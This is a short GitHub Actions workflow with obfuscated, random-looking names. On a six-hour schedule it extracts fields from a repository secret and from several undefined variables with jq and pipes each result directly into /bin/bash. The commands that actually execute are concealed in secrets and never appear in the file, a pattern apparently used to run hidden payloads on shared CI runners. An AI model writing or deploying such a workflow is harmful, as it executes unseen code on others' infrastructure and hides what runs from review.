name: shenerwei7651
on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shenerwei7651
        env:
          d6428: ${{ secrets.d6428 }}
        run: |
          echo $d6428 | jq -r .dex64 | /bin/bash
          echo $c86 | jq -r .yizwd846 | /bin/bash
          echo $xnfe1 | jq -r .dh22 | /bin/bash
          echo $gi53 | jq -r .bynyd9822 | /bin/bash
          echo $b0 | jq -r .zlv17781 | /bin/bash
          echo $icpoy68 | jq -r .swgy86352 | /bin/bash
          echo $on04176 | jq -r .kyuee1616 | /bin/bash
          echo $d6 | jq -r .dbt4527 | /bin/bash

